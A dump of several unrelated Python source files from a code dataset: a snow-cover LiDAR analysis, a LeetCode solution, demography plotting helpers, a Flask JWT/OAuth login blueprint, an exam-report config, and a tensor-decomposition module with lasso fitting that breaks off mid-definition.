SnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['sl']['Index'].astype(int)].dropna()\nUT_sl = len(UnTree_sl_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_UnTree_sl_vcm_df = NoSnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['sl']['Index'].astype(int)].dropna()\nNS_UT_sl = len(NS_UnTree_sl_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_ut_sl = 100.*(float(UT_sl)/(UT_sl+NS_UT_sl))\n\nUnTree_sm_vcm_df = SnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['sm']['Index'].astype(int)].dropna()\nUT_sm = len(UnTree_sm_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_UnTree_sm_vcm_df = NoSnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['sm']['Index'].astype(int)].dropna()\nNS_UT_sm = len(NS_UnTree_sm_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_ut_sm = 100.*(float(UT_sm)/(UT_sm+NS_UT_sm))\n\nUnTree_sh_vcm_df = SnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['sh']['Index'].astype(int)].dropna()\nUT_sh = len(UnTree_sh_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_UnTree_sh_vcm_df = NoSnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['sh']['Index'].astype(int)].dropna()\nNS_UT_sh = len(NS_UnTree_sh_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_ut_sh = 100.*(float(UT_sh)/(UT_sh+NS_UT_sh))\n\n#%% all classification based on topography and northness for 0pen space snow\n#calculation of fSCA for each of 9 categories for 0pen sites\nOpen_el_vcm_df = Snow0penClassVcm_df.loc[topo_dimension_vcm['el']['Index'].astype(int)].dropna()\nOp_el = len(Open_el_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_Open_el_vcm_df = NoSnow0penClassVcm_df.loc[topo_dimension_vcm['el']['Index'].astype(int)].dropna()\nNS_Op_el = len(NS_Open_el_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_0p_el = 100.*(Op_el)/(Op_el+NS_Op_el)\n\nOpen_em_vcm_df = Snow0penClassVcm_df.loc[topo_dimension_vcm['em']['Index'].astype(int)].dropna()\nOp_em = len(Open_em_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_Open_em_vcm_df = NoSnow0penClassVcm_df.loc[topo_dimension_vcm['em']['Index'].astype(int)].dropna()\nNS_Op_em = len(NS_Open_em_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_0p_em = 100.*(Op_em)/(Op_em+NS_Op_em)\n\nOpen_eh_vcm_df = Snow0penClassVcm_df.loc[topo_dimension_vcm['eh']['Index'].astype(int)].dropna()\nOp_eh = len(Open_eh_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_Open_eh_vcm_df = NoSnow0penClassVcm_df.loc[topo_dimension_vcm['eh']['Index'].astype(int)].dropna()\nNS_Op_eh = len(NS_Open_eh_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_0p_eh = 100.*(Op_eh)/(Op_eh+NS_Op_eh)\n\n
Open_nl_vcm_df = Snow0penClassVcm_df.loc[topo_dimension_vcm['nl']['Index'].astype(int)].dropna()\nOp_nl = len(Open_nl_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_Open_nl_vcm_df = NoSnow0penClassVcm_df.loc[topo_dimension_vcm['nl']['Index'].astype(int)].dropna()\nNS_Op_nl = len(NS_Open_nl_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_0p_nl = 100.*(Op_nl)/(Op_nl+NS_Op_nl)\n\nOpen_nm_vcm_df = Snow0penClassVcm_df.loc[topo_dimension_vcm['nm']['Index'].astype(int)].dropna()\nOp_nm = len(Open_nm_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_Open_nm_vcm_df = NoSnow0penClassVcm_df.loc[topo_dimension_vcm['nm']['Index'].astype(int)].dropna()\nNS_Op_nm = len(NS_Open_nm_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_0p_nm = 100.*(Op_nm)/(Op_nm+NS_Op_nm)\n\nOpen_nh_vcm_df = Snow0penClassVcm_df.loc[topo_dimension_vcm['nh']['Index'].astype(int)].dropna()\nOp_nh = len(Open_nh_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_Open_nh_vcm_df = NoSnow0penClassVcm_df.loc[topo_dimension_vcm['nh']['Index'].astype(int)].dropna()\nNS_Op_nh = len(NS_Open_nh_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_0p_nh = 100.*(Op_nh)/(Op_nh+NS_Op_nh)\n\nOpen_sl_vcm_df = Snow0penClassVcm_df.loc[topo_dimension_vcm['sl']['Index'].astype(int)].dropna()\nOp_sl = len(Open_sl_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_Open_sl_vcm_df = NoSnow0penClassVcm_df.loc[topo_dimension_vcm['sl']['Index'].astype(int)].dropna()\nNS_Op_sl = len(NS_Open_sl_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_0p_sl = 100.*(Op_sl)/(Op_sl+NS_Op_sl)\n\nOpen_sm_vcm_df = Snow0penClassVcm_df.loc[topo_dimension_vcm['sm']['Index'].astype(int)].dropna()\nOp_sm = len(Open_sm_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_Open_sm_vcm_df = NoSnow0penClassVcm_df.loc[topo_dimension_vcm['sm']['Index'].astype(int)].dropna()\nNS_Op_sm = len(NS_Open_sm_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_0p_sm = 100.*(Op_sm)/(Op_sm+NS_Op_sm)\n\nOpen_sh_vcm_df = Snow0penClassVcm_df.loc[topo_dimension_vcm['sh']['Index'].astype(int)].dropna()\nOp_sh = len(Open_sh_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_Open_sh_vcm_df = NoSnow0penClassVcm_df.loc[topo_dimension_vcm['sh']['Index'].astype(int)].dropna()\nNS_Op_sh = len(NS_Open_sh_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_0p_sh = 100.*(Op_sh)/(Op_sh+NS_Op_sh)\n\n#%% plotting\nn_groups = 9\nx11 = ['exp_low_0p','flt_low_0p','shl_low_0p','exp_mid_0p',\n       'flt_mid_0p','shl_mid_0p','exp_hi_0p','flt_hi_0p','shl_hi_0p']\nd11 = [FSCA_0p_el,FSCA_0p_nl,FSCA_0p_sl,FSCA_0p_em,FSCA_0p_nm,FSCA_0p_sm,FSCA_0p_eh,FSCA_0p_nh,FSCA_0p_sh]\n\nx22 = ['exp_low_UT','flt_low_UT','shl_low_UT','exp_mid_UT',\n       'flt_mid_UT','shl_mid_UT','exp_hi_UT','flt_hi_UT','shl_hi_UT']\nd22 = [FSCA_ut_el,FSCA_ut_nl,FSCA_ut_sl,FSCA_ut_em,FSCA_ut_nm,FSCA_ut_sm,FSCA_ut_eh,FSCA_ut_nh,FSCA_ut_sh]\n# create plot\nfig, ax = plt.subplots(figsize=(15,10))\nindex = np.arange(n_groups)\nbar_width = 0.4\nopacity = 0.8\n\nrects1 = plt.bar(index, d11, bar_width,color='snow',edgecolor='tan',label='0pen')\n\nrects2 = plt.bar(index + bar_width, d22, bar_width, color='green',label='underTree')\n\nplt.ylabel('fSCA(%)', fontsize=30)\nplt.yticks(fontsize=20)\n\nplt.xticks(index + bar_width/2.,('exp_low','flt_low','shl_low','exp_mid','flt_mid','shl_mid','exp_hi','flt_hi','shl_hi'), fontsize=20)\n\nplt.title('fSCA% in Sagehen Creek 17April2016; under canopy vs. open, exposed vs. 
sheltered',fontsize=20)\nplt.legend(fontsize=20)\nplt.savefig('G:/hhs_DST/lidar_analysis/sagehen/fSCA_pixel_sagehen_elev_topo10_noG30A17.png')\n\n\n\n","sub_path":"LiDarAnalysis/sagehen/LiDar_DemBasedClassification_intertuple_indxMthd_sc17A.py","file_name":"LiDar_DemBasedClassification_intertuple_indxMthd_sc17A.py","file_ext":"py","file_size_in_byte":33207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"544316513","text":"#!/usr/bin/python\nimport sys\n\nclass Solution(object):\n def findLengthOfLCIS(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if not nums:\n return 0\n pre = nums[0]\n cnt = 1\n result = 1\n for i in range(1, len(nums)):\n if nums[i] <= pre:\n pre = nums[i]\n result = max(result, cnt)\n cnt = 1\n else:\n pre = nums[i]\n cnt += 1\n result = max(result, cnt)\n return result\n\ndef main():\n aa = Solution()\n return 0\n\nif __name__ == \"__main__\":\n sys.exit(main())","sub_path":"LeetCode/longestContinuousIncreasingSubsequence.py","file_name":"longestContinuousIncreasingSubsequence.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"344050598","text":"import demes\nimport numpy as np\n\n\ndef inf_start_time(graph: demes.Graph, inf_ratio: float, log_scale: bool) -> float:\n \"\"\"\n Calculate the value on the time axis that will be used instead of infinity.\n\n :param float inf_ratio:\n :param bool log_scale: The time axis uses a log scale.\n :return: The time\n :rtype: float\n \"\"\"\n epoch0_times = []\n for deme in graph.demes:\n epoch0_times.append(deme.epochs[0].end_time)\n if not np.isinf(deme.epochs[0].start_time):\n epoch0_times.append(deme.epochs[0].start_time)\n oldest_noninf_time = max(epoch0_times)\n if oldest_noninf_time == 0:\n # All demes are root demes and have a constant size.\n # About 100 generations is a nice time scale to draw, and we use 113\n # specifically so that the infinity line extends slightly beyond the\n # last tick mark that matplotlib autogenerates.\n inf_start_time: float = 113\n else:\n if log_scale:\n inf_start_time = np.exp(np.log(oldest_noninf_time) / (1 - inf_ratio))\n else:\n inf_start_time = oldest_noninf_time / (1 - inf_ratio)\n return inf_start_time\n\n\ndef size_of_deme_at_time(deme: demes.Deme, time: float) -> float:\n \"\"\"\n Return the population size of the deme at the given time.\n \"\"\"\n for epoch in deme.epochs:\n if epoch.start_time >= time >= epoch.end_time:\n break\n else:\n raise ValueError(f\"deme {deme.id} doesn't exist at time {time}\")\n\n if np.isclose(time, epoch.end_time) or epoch.start_size == epoch.end_size:\n N = epoch.end_size\n else:\n assert epoch.size_function == \"exponential\"\n dt = (epoch.start_time - time) / epoch.time_span\n r = np.log(epoch.end_size / epoch.start_size)\n N = epoch.start_size * np.exp(r * dt)\n return N\n","sub_path":"demesdraw/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"266858127","text":"from datetime import datetime, timedelta\nimport os\nimport jwt\nimport json\nimport requests\nfrom functools import wraps\nfrom urlparse import parse_qs, parse_qsl\nfrom urllib import urlencode\nfrom flask import Flask, g, send_file, request, redirect, url_for, jsonify, render_template\nfrom flask import current_app\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom requests_oauthlib 
import OAuth1\nfrom jwt import DecodeError, ExpiredSignature\nfrom cabildear.config import TOKEN_SECRET\nfrom ..decorators import login_required\n\n# Configuration\n\ncurrent_path = os.path.dirname(__file__)\nclient_path = os.path.abspath(os.path.join(current_path, 'cabildear', 'static'))\n\n\nfrom flask import Blueprint\n\nauth = Blueprint('auth', __name__)\n\nfrom cabildear import db\nfrom ..models import User\n\ndef create_token(user):\n    payload = {\n        'sub': user.id,\n        'iat': datetime.utcnow(),\n        'exp': datetime.utcnow() + timedelta(days=14)\n    }\n    token = jwt.encode(payload, TOKEN_SECRET)\n    return token.decode('unicode_escape')\n\n\ndef parse_token(req):\n    token = req.headers.get('Authorization').split()[1]\n    return jwt.decode(token, TOKEN_SECRET)\n\n\n\n# Routes\n\n\n@auth.route('/')\ndef index():\n    return render_template('index.html')\n\n\n\n\n@auth.route('/api/me')\n@login_required\ndef me():\n    user = User.query.filter_by(id=g.user_id).first()\n    return jsonify(user.to_json())\n\n\n@auth.route('/auth/login', methods=['POST'])\ndef login():\n    user = User.query.filter_by(email=request.json['email']).first()\n    if not user or not user.check_password(request.json['password']):\n        response = jsonify(message='Wrong Email or Password')\n        response.status_code = 401\n        return response\n    token = create_token(user)\n    return jsonify(token=token)\n\n\n@auth.route('/auth/signup', methods=['POST'])\ndef signup():\n    user = User(email=request.json['email'], password=request.json['password'])\n    db.session.add(user)\n    db.session.commit()\n    token = create_token(user)\n    return jsonify(token=token)\n\n\n@auth.route('/auth/facebook', methods=['POST'])\ndef facebook():\n    access_token_url = 'https://graph.facebook.com/v2.3/oauth/access_token'\n    graph_api_url = 'https://graph.facebook.com/v2.3/me'\n\n    params = {\n        'client_id': request.json['clientId'],\n        'redirect_uri': request.json['redirectUri'],\n        'client_secret': current_app.config['FACEBOOK_SECRET'],  # was app.config; 'app' is undefined in this blueprint module\n        'code': request.json['code']\n    }\n\n    # Step 1. Exchange authorization code for access token.\n    r = requests.get(access_token_url, params=params)\n    access_token = dict(parse_qsl(r.text))\n\n    # Step 2. Retrieve information about the current user.\n    r = requests.get(graph_api_url, params=access_token)\n    profile = json.loads(r.text)\n\n    # Step 3. (optional) Link accounts.\n    if request.headers.get('Authorization'):\n        user = User.query.filter_by(facebook=profile['id']).first()\n        if user:\n            response = jsonify(message='There is already a Facebook account that belongs to you')\n            response.status_code = 409\n            return response\n\n        payload = parse_token(request)\n\n        user = User.query.filter_by(id=payload['sub']).first()\n        if not user:\n            response = jsonify(message='User not found')\n            response.status_code = 400\n            return response\n\n        u = User(facebook=profile['id'], display_name=profile['name'])\n        db.session.add(u)\n        db.session.commit()\n        token = create_token(u)\n        return jsonify(token=token)\n\n
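    # Editorial note (added): the Step 3 branch above runs only when a logged-in user\n    # links a Facebook account to an existing profile; Step 4 below is the plain\n    # sign-in/sign-up path keyed on the provider profile id.\n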
    # Step 4. Create a new account or return an existing one.\n    user = User.query.filter_by(facebook=profile['id']).first()\n    if user:\n        token = create_token(user)\n        return jsonify(token=token)\n\n    u = User(facebook=profile['id'], display_name=profile['name'])\n    db.session.add(u)\n    db.session.commit()\n    token = create_token(u)\n    return jsonify(token=token)\n\n@auth.route('/auth/github', methods=['POST'])\ndef github():\n    access_token_url = 'https://github.com/login/oauth/access_token'\n    users_api_url = 'https://api.github.com/user'\n\n    params = {\n        'client_id': request.json['clientId'],\n        'redirect_uri': request.json['redirectUri'],\n        'client_secret': current_app.config['GITHUB_SECRET'],\n        'code': request.json['code']\n    }\n\n    # Step 1. Exchange authorization code for access token.\n    r = requests.get(access_token_url, params=params)\n    access_token = dict(parse_qsl(r.text))\n    headers = {'User-Agent': 'Satellizer'}\n\n    # Step 2. Retrieve information about the current user.\n    r = requests.get(users_api_url, params=access_token, headers=headers)\n    profile = json.loads(r.text)\n\n    # Step 3. (optional) Link accounts.\n    if request.headers.get('Authorization'):\n        user = User.query.filter_by(github=profile['id']).first()\n        if user:\n            response = jsonify(message='There is already a GitHub account that belongs to you')\n            response.status_code = 409\n            return response\n\n        payload = parse_token(request)\n\n        user = User.query.filter_by(id=payload['sub']).first()\n        if not user:\n            response = jsonify(message='User not found')\n            response.status_code = 400\n            return response\n\n        u = User(github=profile['id'], display_name=profile['name'])\n        db.session.add(u)\n        db.session.commit()\n        token = create_token(u)\n        return jsonify(token=token)\n\n    # Step 4. Create a new account or return an existing one.\n    user = User.query.filter_by(github=str(profile['id'])).first()\n    if user:\n        token = create_token(user)\n        return jsonify(token=token)\n\n    u = User(github=str(profile['id']), display_name=profile['name'])\n    db.session.add(u)\n    db.session.commit()\n    token = create_token(u)\n    return jsonify(token=token)\n\n\n\n@auth.route('/auth/google', methods=['POST'])\ndef google():\n    access_token_url = 'https://accounts.google.com/o/oauth2/token'\n    people_api_url = 'https://www.googleapis.com/plus/v1/people/me/openIdConnect'\n\n    payload = dict(client_id=request.json['clientId'],\n                   redirect_uri=request.json['redirectUri'],\n                   client_secret=current_app.config['GOOGLE_SECRET'],  # was app.config; 'app' is undefined here\n                   code=request.json['code'],\n                   grant_type='authorization_code')\n\n    # Step 1. Exchange authorization code for access token.\n    r = requests.post(access_token_url, data=payload)\n    token = json.loads(r.text)\n    headers = {'Authorization': 'Bearer {0}'.format(token['access_token'])}\n\n
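    # Editorial note (added): the openIdConnect endpoint returns standard OIDC claims;\n    # 'sub' (used below) is the stable Google account id and 'name' the display name.\n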
    # Step 2. Retrieve information about the current user.\n    r = requests.get(people_api_url, headers=headers)\n    profile = json.loads(r.text)\n\n    user = User.query.filter_by(google=profile['sub']).first()\n    if user:\n        token = create_token(user)\n        return jsonify(token=token)\n    u = User(google=profile['sub'],\n             display_name=profile['name'])\n    db.session.add(u)\n    db.session.commit()\n    token = create_token(u)\n    return jsonify(token=token)\n\n\n@auth.route('/auth/linkedin', methods=['POST'])\ndef linkedin():\n    access_token_url = 'https://www.linkedin.com/uas/oauth2/accessToken'\n    people_api_url = 'https://api.linkedin.com/v1/people/~:(id,first-name,last-name,email-address)'\n\n    payload = dict(client_id=request.json['clientId'],\n                   redirect_uri=request.json['redirectUri'],\n                   client_secret=current_app.config['LINKEDIN_SECRET'],  # was app.config; 'app' is undefined here\n                   code=request.json['code'],\n                   grant_type='authorization_code')\n\n    # Step 1. Exchange authorization code for access token.\n    r = requests.post(access_token_url, data=payload)\n    access_token = json.loads(r.text)\n    params = dict(oauth2_access_token=access_token['access_token'],\n                  format='json')\n\n    # Step 2. Retrieve information about the current user.\n    r = requests.get(people_api_url, params=params)\n    profile = json.loads(r.text)\n\n    user = User.query.filter_by(linkedin=profile['id']).first()\n    if user:\n        token = create_token(user)\n        return jsonify(token=token)\n    u = User(linkedin=profile['id'],\n             display_name=profile['firstName'] + ' ' + profile['lastName'])\n    db.session.add(u)\n    db.session.commit()\n    token = create_token(u)\n    return jsonify(token=token)\n\n\n@auth.route('/auth/twitter', methods=['POST'])\ndef twitter():\n    request_token_url = 'https://api.twitter.com/oauth/request_token'\n    access_token_url = 'https://api.twitter.com/oauth/access_token'\n\n    if request.json.get('oauth_token') and request.json.get('oauth_verifier'):\n        auth = OAuth1(current_app.config['TWITTER_CONSUMER_KEY'],\n                      client_secret=current_app.config['TWITTER_CONSUMER_SECRET'],\n                      resource_owner_key=request.json.get('oauth_token'),\n                      verifier=request.json.get('oauth_verifier'))\n        r = requests.post(access_token_url, auth=auth)\n        profile = dict(parse_qsl(r.text))\n\n        user = User.query.filter_by(twitter=profile['user_id']).first()\n        if user:\n            token = create_token(user)\n            return jsonify(token=token)\n        u = User(twitter=profile['user_id'],\n                 display_name=profile['screen_name'])\n        db.session.add(u)\n        db.session.commit()\n        token = create_token(u)\n        return jsonify(token=token)\n    else:\n        oauth = OAuth1(current_app.config['TWITTER_CONSUMER_KEY'],\n                       client_secret=current_app.config['TWITTER_CONSUMER_SECRET'],\n                       callback_uri=current_app.config['TWITTER_CALLBACK_URL'])\n        r = requests.post(request_token_url, auth=oauth)\n        oauth_token = dict(parse_qsl(r.text))\n        return jsonify(oauth_token)\n","sub_path":"cabildear/views/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":9746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"471627014","text":"AVG_RANK_OF_SUM_SUBJECT = ['类别', '总分', '排名', '语文', '排名', '数学', '排名', '英语', '排名', '物理', '排名', '化学', '排名']\nAVG_OF_SUM_SUBJECT = ['科目(平均分)', '总分', '语文', '数学', '英语', '物理', '化学']\nNUM_OF_SUBJECT = ['类别(人数)', '语文', '数学', '英语', '物理', '化学']\nLINE_OF_25_60_85 = ['学校', \"前25%人数\", \"前60%人数\", \"前85%人数\"]\nAVG_RANK_OF_SUM_SUBJECT_CLASS = ['学校', '班级', '总分', '排名', '语文', '排名', '数学', '排名', '英语', '排名', '物理', '排名', '化学', '排名', ]\nCLASS_AVG_OF_SUM_SUBJECT = ['科目(类别)', '总分', '语文', '数学', '英语', '物理', '化学']\n
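# Editorial gloss (added; approximate English renderings of the headers above and below):\n# 类别=category, 总分=total score, 排名=rank, 语文=Chinese, 数学=math, 英语=English,\n# 物理=physics, 化学=chemistry, 学校=school, 班级=class, 科目=subject, 人数=student count.\n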
SCHOOL_AVG_OF_SUM_SUBJECT = ['科目(类别)', '总分', '语文', '数学', '英语', '物理', '化学']\n\nREAL_TABLE_EXTRA_TITLE = \"(实考)\"\nJUNIOR_TABLE_EXTRA_TITLE = \"(中考)\"\n\nREAL_CHART_EXTRA_TITLE = \"实考\"\nJUNIOR_CHART_EXTRA_TITLE = \"( 参与中考 )\"\n","sub_path":"refactoring/edu/config/first_row_config.py","file_name":"first_row_config.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"169742249","text":"'''\nFUNCTIONS OVERVIEW\nmy_glmnet: lasso fit at a fixed penalty (wraps R glmnet).\nmy_cv_glmnet: cross-validated lasso fit (wraps R cv.glmnet).\nbeta_fit: blockwise update of the covariate coefficient matrix beta.\n\n\nCLASSES OVERVIEW\n\ninitialization: PARAMETER INITIALIZATIONS\nspaco: spaco with automatic penalty selection.\nspaco_cf: spaco with cross-fit.\nspaco_inf: post-selection inference for the spaco or spaco_cf objects.\n'''\n\nimport numpy as np\nimport random\nimport mxnet\nimport copy\nimport pandas as pd\nfrom sklearn.model_selection import KFold\nimport rpy2\nimport rpy2.robjects as robjects\nfrom rpy2.robjects.packages import importr\nfrom rpy2.robjects import pandas2ri\nimport tensorly as tl\nfrom tensorly.decomposition import parafac\nfrom .helpers import penalty_search, prepare, unfold, FPCA_smooth, Uconstruct\nimport scipy\nfrom rpy2.robjects import r\nimport torch\nimport os\nimport tensorflow as tf\n\nas_null = r['as.null']\npandas2ri.activate()\nstats = importr('stats')\nbase = importr('base')\nglmnet_package = importr('glmnet')\nglmnet = glmnet_package.glmnet\ncv_glmnet = glmnet_package.cv_glmnet\n\ndef seed_everything(seed=2021):\n    \"\"\"\n    Seed everything.\n    \"\"\"\n    random.seed(seed)\n    os.environ['PYTHONHASHSEED'] = str(seed)\n    np.random.seed(seed)\n    torch.manual_seed(seed)\n    torch.cuda.manual_seed(seed)\n    torch.cuda.manual_seed_all(seed)\n    torch.backends.cudnn.deterministic = True\n    mxnet.random.seed(seed)\n    tf.random.set_seed(seed)\n\ndef my_glmnet(x, y, lam, nlam, penalty_factor):\n    fitted = glmnet(x=x, y= y.reshape(len(y),1), family = \"gaussian\",\n                    intercept=False, nlambda=nlam, penalty_factor=penalty_factor)\n    coefficients0 = stats.coef(fitted, s=lam)\n    coefficients0 = robjects.r['summary'](coefficients0)\n    coefficients0 = np.array(coefficients0)\n    coefficients = np.zeros((x.shape[1]))\n    # R's summary() rows are 1-indexed and include the intercept row, hence the -2 offset\n    for j in np.arange(coefficients0.shape[0]):\n        coefficients[int(coefficients0[j, 0]) - 2] = coefficients0[j, 2]\n    return coefficients\n\n\ndef my_cv_glmnet(x, y,penalty_factor, nlam, nfolds, foldid = None):\n    if foldid is None:\n        foldid = as_null()\n    fitted = cv_glmnet(x=x, y= y.reshape(len(y),1), intercept=False,\n                       nfolds=nfolds, foldid = foldid, nlambda=nlam,\n                       penalty_factor=penalty_factor)\n    coefficients0 = stats.coef(fitted, s=\"lambda.min\")\n    extracted = tuple(fitted)\n    lambdas = extracted[0]\n    cvm = extracted[1]\n    cvsd = extracted[2]\n    coefficients0 = robjects.r['summary'](coefficients0)\n    coefficients0 = np.array(coefficients0)\n    coefficients = np.zeros((x.shape[1]))\n    idx0 = np.argmin(cvm)\n    lambda1min = lambdas[idx0]\n    for j in np.arange(coefficients0.shape[0]):\n        coefficients[int(coefficients0[j, 0]) - 2] = coefficients0[j, 2]\n    return coefficients, lambda1min, cvm, cvsd, lambdas\n\ndef beta_fit(Z, transform_mat, transform_vec, beta,intercepts,lambda2, fit_intercept = True,\n             lam2_update = True, nlam2 = 100, nfolds = 5, foldid = as_null(),max_iter = 1, tol = 0.01):\n    augZ = Z.copy()\n    err = 2.0 * tol\n    it = 0\n    beta_prev = beta.copy()\n    intercepts_prev = intercepts.copy()\n    K = transform_vec.shape[1]\n    while it < max_iter and err > tol:\n        if fit_intercept is True:\n            augZ = np.hstack([Z, np.ones((Z.shape[0], 1), dtype=float)])\n        for k in np.arange(K):\n
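            # Editorial note (added): factor k is updated by a lasso on a whitened problem;\n            # the response is scaled by the posterior precision (transform_mat) and the\n            # other factors' contributions are subtracted before calling glmnet.\n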
            mu_trans = np.zeros(Z.shape[0])\n            Z_trans = np.zeros(augZ.shape)\n            bb = np.delete(beta_prev, k, axis=1)\n            tmp0 = np.matmul(Z, bb)\n            if fit_intercept:\n                tmp0 = tmp0 + np.delete(intercepts_prev, k)\n            for i in np.arange(Z.shape[0]):\n                tmp = transform_mat[i, k, :]\n                tmp = np.delete(tmp, k)\n                # transform_mat[i,:,:] ~ Lambda_f - Lambda_f Sigma[i,:,:] Lambda_f\n                # transform_vec[i,:] = Lambda_f Sigma[i,:,:] PhiV^T Lambda_i XI[:,i]\n                # mu_trans[i]=1/np.sqrt(transform_mat[i,:,:]) *(transform_vec[i,k]+sum(Sigma[k,k^c]*tmp0/(s2[k^c]*s2[k])))\n                # note that transform_mat[i,k,k^c] = -cov[i,k,k^c]/(s2[k^c]s2[k]), hence this version is correct\n                mu_trans[i] = (transform_vec[i, k] - np.sum(tmp0[i, :] * tmp))/np.sqrt(transform_mat[i, k, k])\n                Z_trans[i, :] = augZ[i, :] * np.sqrt(transform_mat[i, k, k])\n            penalty_factor = np.ones(Z_trans.shape[1])\n            if fit_intercept:\n                penalty_factor[Z_trans.shape[1] - 1] = 0.0\n            if lam2_update:\n                coefficients, lambda1min, cvm, cvsd, lambdas = my_cv_glmnet(x=Z_trans, y=mu_trans,\n                     penalty_factor=penalty_factor, nlam= nlam2, nfolds=nfolds, foldid = foldid)\n                lambda2[k] = lambda1min\n            else:\n                coefficients = my_glmnet(x=Z_trans, y=mu_trans, lam=lambda2[k], nlam=100, penalty_factor=penalty_factor)\n            p0 = len(coefficients)\n            if fit_intercept:\n                intercepts[k] = coefficients[p0 - 1]\n                p0 = p0 - 1\n            beta[:, k] = coefficients[:p0].copy()\n        err = np.sum((beta - beta_prev)**2)\n        it += 1\n        beta_prev = beta.copy()\n        intercepts_prev = intercepts.copy()\n    return beta, intercepts, lambda2\n\n\nclass initialization():\n    def __init__(self, X, OBS, T0, Xmodes = None, OBSmodes = None, K = 1, mod = \"pca\", homoNoise = True,\n                 vNorm = 1, phiNorm = 1, jen_num = 10, random_num = 10, h = None, eps = 1e-10,\n                 random_state = 0):\n        self.X = X\n        self.O = OBS\n        self.T0 = T0\n        self.K = K\n        self.mod = mod\n        self.homoNoise = homoNoise\n        self.vNorm = vNorm\n        self.phiNorm = phiNorm\n        self.random_num = random_num\n        self.jen_num = jen_num\n        self.Xmodes = Xmodes\n        self.Omodes = OBSmodes\n        self.sigma2 = np.ones(X.shape[2])\n        self.s2 = np.ones(self.K)\n        self.random_state = random_state\n        if self.Xmodes is None or self.Omodes is None:  # was 'self.Xmodes is None' twice\n            self.Xmodes = {}\n            self.Omodes = {}\n            self.Xmodes['X1'],self.Omodes['O1'], self.Xmodes['X2'],self.Omodes['O2'], \\\n            self.Xmodes['X3'],self.Omodes['O3'] = unfold(self.X, self.O)\n        self.V0 = None\n        self.Phi0 = None\n        self.U0 = None\n        self.G = None\n        self.V = None\n        self.Phi = None\n        self.U = None\n        self.h = h  # keep the user-supplied bandwidth (was hard-coded to None)\n        self.eps = eps\n    def Vinit(self):\n        idx = np.sum(1.0 - self.Omodes['O2'], axis=0)\n        idx = np.where(idx == 0)[0]\n        np.random.seed(self.random_state)\n        KJ = self.K\n        if(KJ > self.X.shape[2]):\n            KJ = self.X.shape[2]\n        if self.mod == \"pca\":\n            tmp = self.Xmodes['X2'][:, idx]\n            means = np.mean(tmp, axis=0)\n            tmp = tmp - means\n            tmp = np.linalg.svd(tmp)\n            self.V0 = tmp[0][:, :KJ]\n        else:\n            self.V0 = np.random.normal(size=(self.Xmodes['X2'].shape[0], KJ))  # np.random.normal takes size=, not shape=\n        for k in np.arange(KJ):\n            self.V0[:, k] = self.V0[:, k] / np.sqrt(np.sum(self.V0[:, k] ** 2))\n    def Phiinit(self):\n        num_subject, num_unique_time, num_feature = self.X.shape\n        np.random.seed(self.random_state)\n        KT = self.K\n        if(KT > num_unique_time):\n            KT = num_unique_time\n        if self.mod == \"pca\":\n            W = np.zeros((num_subject, num_unique_time, KT))\n            W[:] = np.nan\n            for k in np.arange(KT):\n                for t in np.arange(num_unique_time):\n                    W[:, t, k] = np.matmul(self.X[:, t, :], self.V0[:, k])\n            Wtotal = {}\n            for s in np.arange(num_unique_time):\n                for t in np.arange(num_unique_time):\n                    if s <= t:\n                        Wtotal[(s, t)] = {}\n
                        for i in np.arange(self.X.shape[0]):\n                            if self.O[i, t, 0] * self.O[i, s, 0] == 1:\n                                Wtotal[(s, t)][i] = np.sum(W[i, t, :] * W[i, s, :])\n            for s in np.arange(num_unique_time):\n                for t in np.arange(num_unique_time):\n                    if s <= t:\n                        if (s, t) in Wtotal.keys():\n                            if len(Wtotal[(s, t)]) == 0:\n                                Wtotal.pop((s, t))\n            if self.h is None:\n                self.h = num_unique_time / np.sqrt(len(Wtotal))\n            W_smooth, self.Phi0, diags = FPCA_smooth(Wtotal, h=self.h,num_unique_time=num_unique_time, K=KT)\n        else:\n            self.Phi0 = np.random.normal(size=(num_unique_time, KT))  # size= keyword; the bare tuple was parsed as loc\n        for k in np.arange(KT):\n            self.Phi0[:, k] = self.Phi0[:, k] / np.sqrt(np.sum(self.Phi0[:, k] ** 2))\n    def 